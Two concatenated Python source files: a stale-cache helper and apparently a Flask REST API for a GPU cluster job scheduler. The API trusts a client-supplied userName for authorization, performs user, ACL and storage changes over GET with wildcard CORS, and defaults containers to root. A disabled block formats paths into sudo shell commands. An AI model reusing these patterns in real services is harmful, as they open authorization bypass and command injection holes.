def update_tmg():
global tmg
while 1:
tmg = tm()
time.sleep(0.2)
tpe.submit(update_tmg)
def StaleBufferFunctional(f, ttr=10, ttl=1800):
global tmg
a = None
tspttr = 0
tspttl = 0
l = threading.Lock()
state = empty
def update_t():
nonlocal tspttl,tspttr
tspttr = tmg+ttr
tspttl = tmg+ttl
def refresh_threaded():
nonlocal a,state
# tsr()
try:
res = f()
except Exception as e:
traceback.print_exc()
with l:
state = idle
else:
with l:
state = idle
a = res
update_t()
def dispatch_refresh():
tpe.submit(refresh_threaded)
def get():
nonlocal a,state,tspttl,tspttr
# past = tm() - ts
        # we can't afford expensive locking every time, so
if state==idle and tmg < tspttr:
# return a
pass
elif state==dispatching:
# return a
pass
else:
with l:
# cache is empty
if state == empty:
a = f()
update_t()
state = idle
# cache is not empty, no dispatch on the way
elif state == idle:
# is cache fresh?
if tmg > tspttl:
# too old.
a = f()
update_t()
elif tmg > tspttr:
# kinda old
state = dispatching
dispatch_refresh()
# # cache is fresh
# else:
# pass
# elif self.state == 'dispatching':
# pass
# else:
# pass
return a
return get
if 1 and __name__ == '__main__':
from commons_static import timethis
def by33():return random.random()+random.random()*111
sb = StaleBuffer(by33, 15, 1000)
sbf = StaleBufferFunctional(by33)
timethis('$by33()')
timethis('$sb.get()')
timethis('$sbf()')
if 0 and __name__ == '__main__':
def kg():
j = 1
def k():
nonlocal j
j+=1
time.sleep(1)
return j
return k
sb = StaleBuffer(kg(), ttr=1, ttl=6)
sbf = StaleBufferFunctional(kg(), ttr=1, ttl=6)
for i in range(10):
print('old',sb.get(), sb.state)
print('new',sbf())
time.sleep(0.3)
print('stalebuf test end')
def stale_cache_old(ttr=3, ttl=6, maxsize=128):
def stale_cache_wrapper(f):
@cachetools.func.lru_cache(maxsize=maxsize)
def get_stale_buffer(*a, **kw):
def sbw():
return f(*a, **kw)
sb = StaleBuffer(sbw, ttr=ttr, ttl=ttl)
return sb
def stale_cache_inner(*a, **kw):
sb = get_stale_buffer(*a, **kw)
return sb.get()
return stale_cache_inner
return stale_cache_wrapper
def stale_cache(ttr=3, ttl=6, maxsize=128):
def stale_cache_wrapped(f):
@functools.lru_cache(maxsize=maxsize)
def get_stale_buffer(*a, **kw):
return StaleBufferFunctional(
lambda:f(*a, **kw),
ttr=ttr,
ttl=ttl,
)
def stale_cache_inner(*a, **kw):
return get_stale_buffer(*a, **kw)()
return stale_cache_inner
return stale_cache_wrapped
if 1 and __name__ == '__main__':
from commons_static import timethis
print('00000'*5)
@stale_cache_old()
def by33():return random.random()+random.random()*111
@stale_cache()
def by34():return random.random()+random.random()*111
timethis('$by33()')
timethis('$by34()')
if 0 and __name__ == '__main__':
def return3():
return 31234019374194
future = tpe.submit(return3)
print(future.result())
j = 1
k = 1
    @stale_cache_old(ttr=1.5)
def a(i):
global j
j+=1
time.sleep(.5)
return i*j
    @stale_cache(ttr=1.5)
def a2(i):
global j
j+=1
time.sleep(.5)
return i*j
    @stale_cache_old(ttr=3)
def b(n):
global k
k+=1
time.sleep(.7)
return k*n
    @stale_cache(ttr=3)
def b2(n):
global k
k+=1
time.sleep(.7)
return k*n
for i in range(20):
print('old',a(3.5), b(6))
print('new',a2(3.5), b2(6))
time.sleep(0.4)
|
dlwsrestapi.py
|
#!/usr/bin/env python3
import sys
import json
import os
import base64
import yaml
import uuid
import logging
from logging.config import dictConfig
import time
import traceback
import threading
from flask import Flask, Response
from flask_restful import reqparse, Api, Resource
from flask import request, jsonify
import prometheus_client
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), "../utils"))
import JobRestAPIUtils
from authorization import ResourceType, Permission, AuthorizationManager, ACLManager
from config import config, global_vars
import authorization
from DataHandler import DataHandler
CONTENT_TYPE_LATEST = str("text/plain; version=0.0.4; charset=utf-8")
def base64encode(str_val):
return base64.b64encode(str_val.encode("utf-8")).decode("utf-8")
def base64decode(str_val):
return base64.b64decode(str_val.encode("utf-8")).decode("utf-8")
dir_path = os.path.dirname(os.path.realpath(__file__))
with open(os.path.join(dir_path, 'logging.yaml'), 'r') as f:
    logging_config = yaml.safe_load(f)
dictConfig(logging_config)
logger = logging.getLogger('restfulapi')
app = Flask(__name__)
api = Api(app)
verbose = True
logger.info( "------------------- Restful API started ------------------------------------- ")
logger.info("%s", config)
if "initAdminAccess" not in global_vars or not global_vars["initAdminAccess"]:
logger.info("===========Init Admin Access===============")
global_vars["initAdminAccess"] = True
logger.info('setting admin access!')
ACLManager.UpdateAce("Administrator", AuthorizationManager.GetResourceAclPath("", ResourceType.Cluster), Permission.Admin, 0)
logger.info('admin access given!')
def _stacktraces():
code = []
for threadId, stack in list(sys._current_frames().items()):
code.append("\n# ThreadID: %s" % threadId)
for filename, lineno, name, line in traceback.extract_stack(stack):
code.append('File: "%s", line %d, in %s' % (filename, lineno, name))
if line:
code.append(" %s" % (line.strip()))
for line in code:
print("_stacktrace: " + line)
def _WorkerThreadFunc():
while True:
_stacktraces()
time.sleep(60)
#workerThread = threading.Thread(target=_WorkerThreadFunc, args=())
#workerThread.daemon = True
#workerThread.start()
def istrue(value):
if isinstance(value, bool):
return value
elif isinstance(value, str):
return value.lower()[0]=='y'
else:
return bool(value)
def tolist(value):
if isinstance( value, str):
if len(value)>0:
return [value]
else:
return []
else:
return value
def remove_creds(job):
job_params = job.get("jobParams", None)
if job_params is None:
return
plugins = job_params.get("plugins", None)
if plugins is None or not isinstance(plugins, dict):
return
blobfuse = plugins.get("blobfuse", None)
if blobfuse is not None and isinstance(blobfuse, list):
for bf in blobfuse:
bf.pop("accountName", None)
bf.pop("accountKey", None)
image_pull = plugins.get("imagePull", None)
if image_pull is not None and isinstance(image_pull, list):
for i_p in image_pull:
i_p.pop("username", None)
i_p.pop("password", None)
def generate_response(result):
resp = jsonify(result)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
class SubmitJob(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('jobName')
parser.add_argument('resourcegpu')
parser.add_argument('gpuType')
parser.add_argument('workPath')
parser.add_argument('dataPath')
parser.add_argument('jobPath')
parser.add_argument('image')
parser.add_argument('cmd')
parser.add_argument('logDir')
parser.add_argument('interactivePort')
parser.add_argument('userName')
parser.add_argument('vcName')
parser.add_argument('preemptionAllowed')
parser.add_argument('userId')
parser.add_argument('runningasroot')
parser.add_argument('containerUserId')
parser.add_argument('familyToken')
parser.add_argument('isParent')
parser.add_argument('jobType')
parser.add_argument('nodeSelector')
parser.add_argument('jobtrainingtype')
parser.add_argument('numpsworker')
parser.add_argument('nummpiworker')
parser.add_argument('jobPriority')
args = parser.parse_args()
params = {}
ret = {}
for key, value in args.items():
if value is not None:
params[key] = value
if args["jobName"] is None or len(args["jobName"].strip()) == 0:
ret["error"] = "job name cannot be empty"
elif args["vcName"] is None or len(args["vcName"].strip()) == 0:
ret["error"] = "vc name cannot be empty"
elif args["resourcegpu"] is None or len(args["resourcegpu"].strip()) == 0:
ret["error"] = "Number of GPU cannot be empty"
elif args["gpuType"] is None or len(args["gpuType"].strip()) == 0:
ret["error"] = "GPU Type cannot be empty"
elif args["dataPath"] is None or len(args["dataPath"].strip()) == 0:
ret["error"] = "datapath cannot be empty"
elif args["image"] is None or len(args["image"].strip()) == 0:
ret["error"] = "docker image cannot be empty"
elif args["jobType"] is None or len(args["jobType"].strip()) == 0:
ret["error"] = "jobType cannot be empty"
else:
params["jobName"] = args["jobName"]
params["vcName"] = args["vcName"]
params["resourcegpu"] = args["resourcegpu"]
params["gpuType"] = args["gpuType"]
params["workPath"] = args["workPath"]
params["dataPath"] = args["dataPath"]
params["image"] = args["image"]
params["cmd"] = args["cmd"]
params["jobType"] = args["jobType"]
params["preemptionAllowed"] = args["preemptionAllowed"]
params["jobtrainingtype"] = args["jobtrainingtype"]
if args["jobtrainingtype"] == "PSDistJob":
params["numps"] = 1
params["numpsworker"] = args["numpsworker"]
if args["jobtrainingtype"] == "MPIDistJob":
params["nummpiworker"] = args["nummpiworker"]
if args["jobPath"] is not None and len(args["jobPath"].strip()) > 0:
params["jobPath"] = args["jobPath"]
if args["logDir"] is not None and len(args["logDir"].strip()) > 0:
params["logDir"] = args["logDir"]
if args["userId"] is not None and len(args["userId"].strip()) > 0:
params["userId"] = args["userId"]
else:
                # !! note: if userId is not provided, the container will be running as root. There shouldn't be any security concern, since all resources in the docker container are the user's own property. Also, we plan to allow the user to choose "run as root".
params["userId"] = "0"
if args["nodeSelector"] is not None and len(args["nodeSelector"].strip()) > 0:
params["nodeSelector"] = {args["nodeSelector"]:"active"}
if args["interactivePort"] is not None and len(args["interactivePort"].strip()) > 0:
params["interactivePort"] = args["interactivePort"]
if args["containerUserId"] is not None and len(args["containerUserId"].strip()) > 0:
params["containerUserId"] = args["containerUserId"]
else:
params["containerUserId"] = params["userId"]
if args["userName"] is not None and len(args["userName"].strip()) > 0:
params["userName"] = args["userName"]
else:
params["userName"] = "default"
if args["familyToken"] is not None and len(args["familyToken"].strip()) > 0:
params["familyToken"] = args["familyToken"]
else:
params["familyToken"] = str(uuid.uuid4())
if args["isParent"] is not None and len(args["isParent"].strip()) > 0:
params["isParent"] = args["isParent"]
else:
params["isParent"] = "1"
if args["jobPriority"] is not None and len(args["jobPriority"].strip()) > 0:
params["jobPriority"] = args["jobPriority"]
params["mountpoints"] = []
addcmd = ""
if "mounthomefolder" in config and istrue(config["mounthomefolder"]) and "storage-mount-path" in config:
alias = JobRestAPIUtils.getAlias(params["userName"])
params["mountpoints"].append({"name":"homeholder","containerPath":os.path.join("/home", alias),"hostPath":os.path.join(config["storage-mount-path"], "work", alias)})
if "mountpoints" in config and "storage-mount-path" in config:
# see link_fileshares in deploy.py
for k, v in config["mountpoints"].items():
if "mountpoints" in v:
for basename in tolist(v["mountpoints"]):
if basename!="" and basename not in config["default-storage-folders"] and basename in config["deploymounts"]:
hostBase = os.path.join(config["storage-mount-path"], basename[1:]) if os.path.isabs(basename) else os.path.join(config["storage-mount-path"], basename)
basealias = basename[1:] if os.path.isabs(basename) else basename
containerBase = os.path.join("/", basename)
alias = JobRestAPIUtils.getAlias(params["userName"])
shares = [alias]
if "publicshare" in v:
if "all" in v["publicshare"]:
shares += (tolist(v["publicshare"]["all"]))
if basename in v["publicshare"]:
shares += (tolist(v["publicshare"][basename]))
for oneshare in shares:
hostPath = os.path.join(hostBase, oneshare)
containerPath = os.path.join(containerBase, oneshare)
if v["type"]=="emptyDir":
params["mountpoints"].append({"name":basealias+"-"+oneshare,
"containerPath": containerPath,
"hostPath": "/emptydir",
"emptydir": "yes" })
else:
params["mountpoints"].append({"name":basealias+"-"+oneshare,
"containerPath": containerPath,
"hostPath": hostPath })
if False and "type" in v and v["type"]!="local" and v["type"]!="localHDD":
# This part is disabled, see if False above
# This is a shared drive, we can try to create it, and enable the write permission
if not os.path.exists(hostPath):
cmd = "sudo mkdir -m 0777 -p %s; " % hostPath
os.system( cmd )
logger.info( cmd )
if oneshare==alias:
cmd = "sudo chown %s:%s %s; " % (params["containerUserId"], "500000513", hostPath )
os.system(cmd )
logger.info( cmd )
addcmd += "chmod 0777 %s ; " % containerPath
if oneshare==alias:
addcmd += "chown %s:%s %s ; " % ( params["userId"], "500000513", containerPath )
if verbose and len(params["mountpoints"]) > 0:
logger.info("Mount path for job %s", params )
for mounts in params["mountpoints"]:
logger.info( "Share %s, mount %s at %s", mounts["name"], mounts["hostPath"], mounts["containerPath"])
if len(addcmd) > 0:
params["cmd"] = addcmd + params["cmd"]
output = JobRestAPIUtils.SubmitJob(json.dumps(params))
if "jobId" in output:
ret["jobId"] = output["jobId"]
else:
if "error" in output:
ret["error"] = "Cannot create job!" + output["error"]
else:
ret["error"] = "Cannot create job!"
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(SubmitJob, '/SubmitJob')
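# Example call (illustrative only; values are placeholders):
#   GET /SubmitJob?jobName=mnist&vcName=platform&resourcegpu=1&gpuType=P100
#       &dataPath=imagenet&image=pytorch/pytorch:latest&cmd=python%20train.py
#       &jobType=training&userName=alice
# A successful response carries {"jobId": "..."}, otherwise {"error": "..."}.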
class PostJob(Resource):
def post(self):
params = request.get_json(force=True)
logger.info("Post Job")
logger.info(params)
ret = {}
output = JobRestAPIUtils.SubmitJob(json.dumps(params))
if "jobId" in output:
ret["jobId"] = output["jobId"]
else:
if "error" in output:
ret["error"] = "Cannot create job!" + output["error"]
else:
ret["error"] = "Cannot create job!"
logger.info("Submit job through restapi, output is %s, ret is %s", output, ret)
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(PostJob, '/PostJob')
# shows a list of all jobs for a given user / virtual cluster
class ListJobs(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('userName')
parser.add_argument('num')
parser.add_argument('vcName')
parser.add_argument('jobOwner')
args = parser.parse_args()
num = None
if args["num"] is not None:
try:
num = int(args["num"])
except:
pass
jobs = JobRestAPIUtils.GetJobList(args["userName"], args["vcName"], args["jobOwner"], num)
jobList = []
queuedJobs = []
runningJobs = []
finishedJobs = []
visualizationJobs = []
for job in jobs:
job.pop("jobDescriptionPath",None)
job.pop("jobDescription",None)
job["jobParams"] = json.loads(base64decode(job["jobParams"]))
if "endpoints" in job and job["endpoints"] is not None and len(job["endpoints"].strip()) > 0:
job["endpoints"] = json.loads(job["endpoints"])
if "jobStatusDetail" in job and job["jobStatusDetail"] is not None and len(job["jobStatusDetail"].strip()) > 0:
try:
s = job["jobStatusDetail"]
s = base64decode(s)
s = json.loads(s)
job["jobStatusDetail"] = s
except Exception as e:
job["jobStatusDetail"] = s
pass
# Remove credentials
remove_creds(job)
if job["jobStatus"] == "running":
if job["jobType"] == "training":
runningJobs.append(job)
elif job["jobType"] == "visualization":
visualizationJobs.append(job)
elif job["jobStatus"] == "queued" or job["jobStatus"] == "scheduling" or job["jobStatus"] == "unapproved":
queuedJobs.append(job)
else:
finishedJobs.append(job)
ret = {}
ret["queuedJobs"] = queuedJobs
ret["runningJobs"] = runningJobs
ret["finishedJobs"] = finishedJobs
ret["visualizationJobs"] = visualizationJobs
ret["meta"] = {"queuedJobs": len(queuedJobs),"runningJobs": len(runningJobs),"finishedJobs": len(finishedJobs),"visualizationJobs": len(visualizationJobs)}
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(ListJobs, '/ListJobs')
# shows a list of all jobs (v2 response format) for a given user / virtual cluster
class ListJobsV2(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('userName')
parser.add_argument('num')
parser.add_argument('vcName')
parser.add_argument('jobOwner')
args = parser.parse_args()
num = None
if args["num"] is not None:
try:
num = int(args["num"])
except:
pass
jobs = JobRestAPIUtils.GetJobListV2(args["userName"], args["vcName"], args["jobOwner"], num)
for _, joblist in list(jobs.items()):
if isinstance(joblist, list):
for job in joblist:
remove_creds(job)
resp = generate_response(jobs)
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(ListJobsV2, '/ListJobsV2')
class KillJob(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('jobId')
parser.add_argument('userName')
args = parser.parse_args()
jobId = args["jobId"]
userName = args["userName"]
result = JobRestAPIUtils.KillJob(userName, jobId)
ret = {}
if result:
# NOTE "Success" prefix is used in reaper, please also update reaper code
# if need to change it.
ret["result"] = "Success, the job is scheduled to be terminated."
else:
ret["result"] = "Cannot Kill the job. Job ID:" + jobId
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(KillJob, '/KillJob')
class PauseJob(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('jobId')
parser.add_argument('userName')
args = parser.parse_args()
jobId = args["jobId"]
userName = args["userName"]
result = JobRestAPIUtils.PauseJob(userName, jobId)
ret = {}
if result:
ret["result"] = "Success, the job is scheduled to be paused."
else:
ret["result"] = "Cannot pause the job. Job ID:" + jobId
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(PauseJob, '/PauseJob')
class ResumeJob(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('jobId')
parser.add_argument('userName')
args = parser.parse_args()
jobId = args["jobId"]
userName = args["userName"]
result = JobRestAPIUtils.ResumeJob(userName, jobId)
ret = {}
if result:
ret["result"] = "Success, the job is scheduled to be resumed."
else:
ret["result"] = "Cannot resume the job. Job ID:" + jobId
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(ResumeJob, '/ResumeJob')
class CloneJob(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('jobId')
parser.add_argument('userName')
args = parser.parse_args()
jobId = args["jobId"]
userName = args["userName"]
result = JobRestAPIUtils.CloneJob(userName, jobId)
ret = {}
if result:
ret["result"] = "Success, the job is scheduled to be cloned."
else:
ret["result"] = "Cannot clone the job. Job ID:" + jobId
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(CloneJob, '/CloneJob')
class ApproveJob(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('jobId')
parser.add_argument('userName')
args = parser.parse_args()
jobId = args["jobId"]
userName = args["userName"]
result = JobRestAPIUtils.ApproveJob(userName, jobId)
ret = {}
if result:
ret["result"] = "Success, the job has been approved."
else:
ret["result"] = "Cannot approve the job. Job ID:" + jobId
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(ApproveJob, '/ApproveJob')
class GetCommands(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('jobId')
parser.add_argument('userName')
args = parser.parse_args()
jobId = args["jobId"]
userName = args["userName"]
commands = JobRestAPIUtils.GetCommands(userName, jobId)
resp = jsonify(commands)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(GetCommands, '/GetCommands')
class GetJobDetail(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('jobId')
parser.add_argument('userName')
args = parser.parse_args()
jobId = args["jobId"]
userName = args["userName"]
job = JobRestAPIUtils.GetJobDetail(userName, jobId)
job["jobParams"] = json.loads(base64decode(job["jobParams"]))
if "endpoints" in job and job["endpoints"] is not None and len(job["endpoints"].strip()) > 0:
job["endpoints"] = json.loads(job["endpoints"])
if "jobStatusDetail" in job and job["jobStatusDetail"] is not None and len(job["jobStatusDetail"].strip()) > 0:
try:
job["jobStatusDetail"] = json.loads(base64decode(job["jobStatusDetail"]))
except Exception as e:
pass
if "jobMeta" in job:
job.pop("jobMeta",None)
# Remove credentials
remove_creds(job)
resp = jsonify(job)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(GetJobDetail, '/GetJobDetail')
class GetJobDetailV2(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('jobId')
parser.add_argument('userName')
args = parser.parse_args()
jobId = args["jobId"]
userName = args["userName"]
job = JobRestAPIUtils.GetJobDetailV2(userName, jobId)
remove_creds(job)
resp = generate_response(job)
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(GetJobDetailV2, '/GetJobDetailV2')
class GetJobLog(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('jobId', required=True)
parser.add_argument('userName', required=True)
args = parser.parse_args()
jobId = args["jobId"]
userName = args["userName"]
return JobRestAPIUtils.GetJobLog(userName, jobId)
##
## Actually setup the Api resource routing here
##
api.add_resource(GetJobLog, '/GetJobLog')
class GetJobStatus(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('jobId')
args = parser.parse_args()
jobId = args["jobId"]
job = JobRestAPIUtils.GetJobStatus(jobId)
resp = jsonify(job)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(GetJobStatus, '/GetJobStatus')
class GetClusterStatus(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('userName')
args = parser.parse_args()
userName = args["userName"]
cluster_status, last_updated_time = JobRestAPIUtils.GetClusterStatus()
cluster_status["last_updated_time"] = last_updated_time
resp = jsonify(cluster_status)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(GetClusterStatus, '/GetClusterStatus')
class AddCommand(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('jobId')
parser.add_argument('command')
parser.add_argument('userName')
args = parser.parse_args()
userName = args["userName"]
jobId = args["jobId"]
command = args["command"]
ret = {}
if command is None or len(command) == 0:
ret["result"] = "Cannot Run empty Command. Job ID:" + jobId
else:
result = JobRestAPIUtils.AddCommand(userName, jobId, command)
if result:
ret["result"] = "Success, the command is scheduled to be run."
else:
ret["result"] = "Cannot Run the Command. Job ID:" + jobId
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(AddCommand, '/AddCommand')
class AddUser(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('userName')
parser.add_argument('uid')
parser.add_argument('gid')
parser.add_argument('groups')
args = parser.parse_args()
ret = {}
userName = args["userName"]
if args["uid"] is None or len(args["uid"].strip()) == 0:
uid = authorization.INVALID_ID
else:
uid = args["uid"]
if args["gid"] is None or len(args["gid"].strip()) == 0:
gid = authorization.INVALID_ID
else:
gid = args["gid"]
if args["groups"] is None or len(args["groups"].strip()) == 0:
groups = []
else:
groups = args["groups"]
ret["status"] = JobRestAPIUtils.AddUser(userName, uid, gid, groups)
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(AddUser, '/AddUser')
class GetAllUsers(Resource):
def get(self):
data_handler = None
try:
data_handler = DataHandler()
ret = data_handler.GetUsers()
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
except Exception as e:
return "Internal Server Error. " + str(e), 400
finally:
if data_handler is not None:
data_handler.Close()
##
## Actually setup the Api resource routing here
##
api.add_resource(GetAllUsers, '/GetAllUsers')
class UpdateAce(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('userName')
parser.add_argument('identityName')
parser.add_argument('resourceType')
parser.add_argument('resourceName')
parser.add_argument('permissions')
args = parser.parse_args()
username = args["userName"]
identityName = str(args["identityName"])
resourceType = int(args["resourceType"])
resourceName = str(args["resourceName"])
permissions = int(args["permissions"])
ret = {}
ret["result"] = JobRestAPIUtils.UpdateAce(username, identityName, resourceType, resourceName, permissions)
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(UpdateAce, '/UpdateAce')
class DeleteAce(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('userName')
parser.add_argument('identityName')
parser.add_argument('resourceType')
parser.add_argument('resourceName')
args = parser.parse_args()
username = args["userName"]
identityName = str(args["identityName"])
resourceType = int(args["resourceType"])
resourceName = str(args["resourceName"])
ret = {}
ret["result"] = JobRestAPIUtils.DeleteAce(username, identityName, resourceType, resourceName)
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(DeleteAce, '/DeleteAce')
class IsClusterAdmin(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('userName')
args = parser.parse_args()
username = args["userName"]
ret = {}
ret["result"] = AuthorizationManager.IsClusterAdmin(username)
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(IsClusterAdmin, '/IsClusterAdmin')
class GetACL(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('userName')
args = parser.parse_args()
username = args["userName"]
ret = {}
ret["result"] = AuthorizationManager.GetAcl(username)
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(GetACL, '/GetACL')
class GetAllACL(Resource):
def get(self):
ret = {}
ret["result"] = ACLManager.GetAllAcl()
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(GetAllACL, '/GetAllACL')
class ListVCs(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('userName')
args = parser.parse_args()
userName = args["userName"]
ret = {}
ret["result"] = JobRestAPIUtils.ListVCs(userName)
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(ListVCs, '/ListVCs')
class GetVC(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('userName')
parser.add_argument('vcName')
args = parser.parse_args()
userName = args["userName"]
vcName = args["vcName"]
ret = JobRestAPIUtils.GetVC(userName, vcName)
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(GetVC, '/GetVC')
class AddVC(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('vcName')
parser.add_argument('quota')
parser.add_argument('metadata')
parser.add_argument('userName')
args = parser.parse_args()
vcName = args["vcName"]
quota = args["quota"]
metadata = args["metadata"]
userName = args["userName"]
ret = {}
ret["result"] = JobRestAPIUtils.AddVC(userName, vcName, quota, metadata)
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(AddVC, '/AddVC')
class DeleteVC(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('vcName')
parser.add_argument('userName')
args = parser.parse_args()
vcName = args["vcName"]
userName = args["userName"]
ret = {}
ret["result"] = JobRestAPIUtils.DeleteVC(userName, vcName)
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(DeleteVC, '/DeleteVC')
class UpdateVC(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('vcName')
parser.add_argument('quota')
parser.add_argument('metadata')
parser.add_argument('userName')
args = parser.parse_args()
vcName = args["vcName"]
quota = args["quota"]
metadata = args["metadata"]
userName = args["userName"]
ret = {}
ret["result"] = JobRestAPIUtils.UpdateVC(userName, vcName, quota, metadata)
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(UpdateVC, '/UpdateVC')
class ListStorages(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('vcName')
parser.add_argument('userName')
args = parser.parse_args()
vcName = args["vcName"]
userName = args["userName"]
ret = {}
ret["result"] = JobRestAPIUtils.ListStorages(userName, vcName)
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(ListStorages, '/ListStorages')
class AddStorage(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('vcName')
parser.add_argument('storageType')
parser.add_argument('url')
parser.add_argument('metadata')
parser.add_argument('defaultMountPath')
parser.add_argument('userName')
args = parser.parse_args()
vcName = args["vcName"]
storageType = args["storageType"]
url = args["url"]
metadata = args["metadata"]
defaultMountPath = args["defaultMountPath"]
userName = args["userName"]
ret = {}
ret["result"] = JobRestAPIUtils.AddStorage(userName, vcName, url, storageType, metadata, defaultMountPath)
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(AddStorage, '/AddStorage')
class DeleteStorage(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('vcName')
parser.add_argument('userName')
parser.add_argument('url')
args = parser.parse_args()
vcName = args["vcName"]
userName = args["userName"]
url = args["url"]
ret = {}
ret["result"] = JobRestAPIUtils.DeleteStorage(userName, vcName, url)
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(DeleteStorage, '/DeleteStorage')
class UpdateStorage(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('vcName')
parser.add_argument('storageType')
parser.add_argument('url')
parser.add_argument('metadata')
parser.add_argument('defaultMountPath')
parser.add_argument('userName')
args = parser.parse_args()
vcName = args["vcName"]
storageType = args["storageType"]
url = args["url"]
metadata = args["metadata"]
